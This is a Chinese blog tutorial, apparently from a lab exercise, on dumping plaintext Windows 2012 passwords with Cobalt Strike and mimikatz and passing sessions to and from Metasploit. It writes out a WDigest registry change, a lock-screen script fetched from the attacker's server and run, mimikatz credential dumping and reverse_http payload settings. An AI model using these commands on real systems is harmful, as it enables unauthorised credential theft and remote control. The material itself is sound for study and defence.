当前位置: 首页 > news >正文

中心渗透Ⅱ

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.lryc.cn/news/355450.html

相关文章:

  • 【webrtc】RtpToNtpEstimator:最小二乘法、ntp估计及c++实例
  • 【DevOps】Elasticsearch在Ubuntu 20.04上的安装与配置:详细指南
  • windows内存管理
  • c++ 将指针转换为 void* 后,转换为怎么判断原指针类型?
  • Swift 属性
  • 基于maxkey接入jeecgboot并实现账户同步
  • kafka Kerberos集群环境部署验证
  • [C++]debug介绍+debug时如何查看指针指向内存处的值
  • AI学习指南数学工具篇-凸优化在支持逻辑回归中的应用
  • Flutter 中的 AspectRatio 小部件:全面指南
  • 应用程序中的会话管理和Cookie安全指南
  • 备战秋招c++ 【持续更新】
  • 整数拆分~
  • 【Qt Creator】跨平台的C++图形用户界面应用程序开发框架---QT
  • KingbaseES数据库物理备份还原sys_rman
  • 【CV】视频图像背景分割MOG2,KNN,GMG
  • 使用 Python 简单几步去除 PDF 水印
  • 【香橙派 AIpro】OrangePi AIpro :教育、机器人、无人机领域的超级AI大脑,华为昇腾处理器驱动的AI开发板新标杆
  • 【Mac】 CleanMyMac X for mac V4.15.2中文修复版安装教程
  • 单片机通信协议(1):SPI简介
  • 免税商品优选购物商城,基于 SpringBoot+Vue+MySQL 开发的前后端分离的免税商品优选购物商城设计实现
  • 京准电子、NTP电子时钟系统(网络时钟系统)概述
  • 【常用的队列总结】
  • 机器学习过拟合和欠拟合!看这一篇文章就够了 建议收藏!(上篇)
  • 关于阳光雨露外派联想的面试感想
  • 深度神经网络介绍与实战
  • 图解 Transformer
  • SpringCloud配置文件bootstrap不生效问题解决
  • Java面试八股之自旋是什么意思
  • 做好随时离开的准备:前一天还在为618加班到凌晨,第二天就被裁了